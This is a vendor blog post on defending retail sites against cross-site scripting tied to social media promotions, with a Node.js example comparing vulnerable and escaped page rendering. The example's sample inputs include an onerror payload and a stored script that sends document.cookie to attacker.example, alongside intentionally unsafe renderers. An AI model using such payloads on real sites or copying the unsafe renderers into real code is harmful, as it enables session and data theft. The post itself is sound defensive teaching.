Preventing Cross Site Scripting and Request Forgery Threats in Your Business’s Social Media Campaigns

Retailers are increasing their reliance on social media platforms to further engage with their customers and partners. According to a UMass – Dartmouth social media study, over 75% of Fortune 500 companies use social media sites such as LinkedIn, Facebook and Twitter to reach customers with promotions and deals, as well as to engage and recruit potential new customers and employees. This progress is advantageous on many levels, but it does introduce fertile new ground on which attackers can launch exploitation and data gathering attacks, given the relatively open nature of social media presences.

XSS and Your Web API

Perhaps the most notable of these data gathering and exploitation attacks is cross-site scripting (XSS). Once dismissed as a nuisance that popped up alert boxes, XSS has matured: a script injected into a page can call the web APIs (web application programming interfaces) that every modern social network, such as Facebook, Instagram and Twitter, exposes, and it does so with the logged-in victim's session.

Web APIs, which allow software to interact with a website or web-based service, are used extensively by most major websites, such as Google and Facebook, in nearly every function they perform. For example, have you noticed how many websites let you authenticate by clicking a "Log in with Facebook" button? That is Facebook's web API at work: the site never sees your Facebook password, but it does receive a token that lets it act on your behalf within the permissions you granted.

A web API defines a set of rules for how software and other websites may interact with it: what information is shared, and how it is transmitted. The connected application or website then accesses and uses that information, typically for as long as the token it was issued remains valid.

A Hypothetical Scenario

As you can see, sharing data and functionality across different websites and application platforms raises security questions, and the risk grows wherever a web API, or a site that consumes one, is designed or implemented with security flaws. Such flaws become more exploitable with modern XSS attacks, which use not only the web API but also the browser's own scripting engine (JavaScript, or legacy plugins such as ActiveX) to deliver and execute malicious code. XSS does not directly target any one user; it targets the website or application that users trust, turning the vulnerable site or application into the attack mechanism and running the attacker's script with each victim's session.

This is a concern for retailers who rely on social media outlets and the web APIs behind them. Few retailers sell directly through Facebook, but smaller retailers often use it to make products and services readily available for purchase by linking to their own storefront, which puts customer account and credit card information at risk if any page along that path is vulnerable.

Retailers can also be hit on their own sites. For example, Retailer X posts a 50%-off clearance ad on Facebook that is only obtainable when the customer clicks that post, and the landing page on Retailer X's site displays the promo code it receives in the URL without encoding it. An attacker who notices this shares a lookalike link under the post with a script hidden in the promo parameter. The customer clicks, lands on Retailer X's website, and, unknown to them, the script runs in the page with the full trust of Retailer X's origin and records every keystroke. If the customer logs in or enters credit card information, that data is sent to the attacker. Retailer X has failed its customer by not keeping their data safe, which will inevitably lead to bad PR and a loss of customer loyalty. Note that the customer's browser was never "infected": the script ran only because Retailer X's page echoed untrusted input into its HTML.

How Champion Can Help Prevent Attacks

The big question retailers ask us is how they can prevent XSS attacks that are triggered from systems that are not their own, such as a social network feed. Champion approaches this by breaking the problem into smaller steps, each of which we then remediate.

We begin by determining which of the two classic XSS attack vectors a retailer is most exposed to:

  • Reflected XSS, in which the malicious script arrives in the request itself, usually as part of a specially crafted URL, and the page echoes it back into its HTML. It only fires when a victim follows the attacker's link, so it depends on social engineering, and a social media feed full of promotional links is exactly where such a link blends in.
  • Stored XSS, in which the malicious script is saved on the server, for example in a product review, comment or profile field, and is served to every visitor who views that content. No crafted link is needed, so a single flaw exposes every customer, and the script typically harvests what the victim submits to the site (logon credentials or payment information).

(A third class, DOM-based XSS, lives entirely in the site's own client-side script; the output-encoding discipline described below applies to it as well.)

Once we determine this, things get a little trickier. Because the fix depends on the languages, plugins and interfaces a retailer runs on its web servers, next steps are determined case by case. But here are some of the more common fixes we have applied in our retail engagements:

  • Encode HTML markup characters (&, <, >, " and ') whenever untrusted data is written into a page, using the encoding that matches the context (HTML body, attribute, JavaScript or URL)
  • Where user-supplied HTML must be allowed, sanitize it with a maintained library such as HTMLPurifier, and keep its whitelist as narrow as the feature permits
  • Avoid accepting raw HTML at all where possible and opt for a restricted markup such as Markdown, rendered with HTML output escaped
  • Use template libraries that escape output by default, so a developer has to opt out of escaping explicitly rather than remember to opt in
  • Take advantage of the security features in modern browsers: the Secure and HttpOnly cookie flags, which keep session cookies off plain HTTP and out of reach of script, and a Content-Security-Policy header that blocks inline script and restricts where scripts may load from

While these are only a few of the techniques that can be used to head off XSS attacks, the proven effectiveness of these measures can go a long way towards protecting retail customer data.
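To make the two vectors and the fixes above concrete, here is an added example in plain Node.js; it is not code from the original post or from Champion. The page names (a promo landing page and a product review list), the `promo` parameter, the sample payloads and the function names are assumptions for illustration. It renders each page the vulnerable way and the hardened way, and then lists which tags the untrusted input managed to add to the document.

```javascript
// Added example (not code from the original page or from Champion). It contrasts
// reflected and stored XSS and shows the output-encoding and header fixes from
// the list above, in plain Node.js with no framework. The page names, the
// "promo" parameter and the function names are assumptions for illustration.

// Constructed sample inputs. The payloads are inert: they are only strings the
// checks below are run against, never executed.
const NORMAL_QUERY = '?promo=SPRING50';
const ATTACK_QUERY = '?promo=<img src=x onerror="alert(document.cookie)">';

function parsePromo(query) {
  return new URLSearchParams(query).get('promo') || '';
}

// Reflected XSS: the request parameter is echoed straight into the HTML.
function renderLandingPageVulnerable(query) {
  return `<h1>Your code: ${parsePromo(query)}</h1>`;
}

// "Encode HTML markup characters": turn the five HTML metacharacters into
// entities so the browser treats the value as text in body and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

function renderLandingPageHardened(query) {
  return `<h1>Your code: ${escapeHtml(parsePromo(query))}</h1>`;
}

// Stored XSS: the payload is persisted (here an in-memory review list) and
// served to every later visitor, so the attacker needs no crafted link.
const reviews = [];
function saveReview(text) { reviews.push(text); }
function renderReviewsVulnerable() {
  return '<ul>' + reviews.map(r => `<li>${r}</li>`).join('') + '</ul>';
}
function renderReviewsHardened() {
  return '<ul>' + reviews.map(r => `<li>${escapeHtml(r)}</li>`).join('') + '</ul>';
}

// Check: the distinct tag names in the rendered HTML that the template itself
// did not put there. An encoded payload contains no '<', so it yields no tag.
function unexpectedTags(html, allowedTags) {
  const names = [...html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)].map(m => m[1].toLowerCase());
  return [...new Set(names)].filter(n => !allowedTags.includes(n));
}

// Browser-side defences from the list: a Content-Security-Policy that refuses
// inline script (which is what an injected onerror= handler or <script> is), and
// cookie flags that keep the session token out of document.cookie and off
// plain HTTP. These limit the damage of an XSS bug they do not remove.
function securityHeaders(sessionId) {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
    'Set-Cookie': `session=${sessionId}; Secure; HttpOnly; SameSite=Lax; Path=/`,
  };
}

// Runs both vectors against both renderers and reports the tags the attacker got in.
function demo() {
  saveReview('Great deal, fast shipping.');
  saveReview('<script>fetch("https://attacker.example/?c=" + document.cookie)</script>');
  return {
    reflectedVulnerable: unexpectedTags(renderLandingPageVulnerable(ATTACK_QUERY), ['h1']),
    reflectedHardened: unexpectedTags(renderLandingPageHardened(ATTACK_QUERY), ['h1']),
    storedVulnerable: unexpectedTags(renderReviewsVulnerable(), ['ul', 'li']),
    storedHardened: unexpectedTags(renderReviewsHardened(), ['ul', 'li']),
  };
}

console.log(demo());
```

The vulnerable renderers let an `img` tag (reflected) and a `script` tag (stored) into the page; the hardened ones yield no unexpected tags, and `renderLandingPageHardened(NORMAL_QUERY)` still shows a legitimate code unchanged. In a real application `escapeHtml` is the job of an auto-escaping template engine or, for rich content, a sanitizer such as HTMLPurifier; an allow-list on the promo code's format is a sensible second layer, and the CSP above would also block the `onerror` handler even if encoding were missed somewhere.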

Your XSS Champions

Champion has a great deal of experience working with retailers to harden their websites against social media-based web API vulnerabilities. Our technical staff is at the ready to engage with your business to lock the doors against XSS attacks, further protecting your customers in a hostile web environment. Reach out to us to start protecting your social media interests today.

Erick Bacallao joined Champion Solutions Group in 2015 after a career of Software Development in Cuba at the National Cancer Care Institute of Cuba, followed by moving to the States with allAware.


Champion acquired allAware and its properties and Erick has utilized his extensive background and expertise in IT and Software Development to rise to VP of Product Development in less than 5 years. During this time, Erick has been involved with key projects that led to the launch of numerous products including CSP Boss, Inscape platform and 365 Productivity Insights.


Erick has a Bachelor of Science in Computer Science from the University of Havana. He won Gold Medals for Programming from the Ministry of Education in Cuba, and he is certainly still a Gold Medalist for Champion!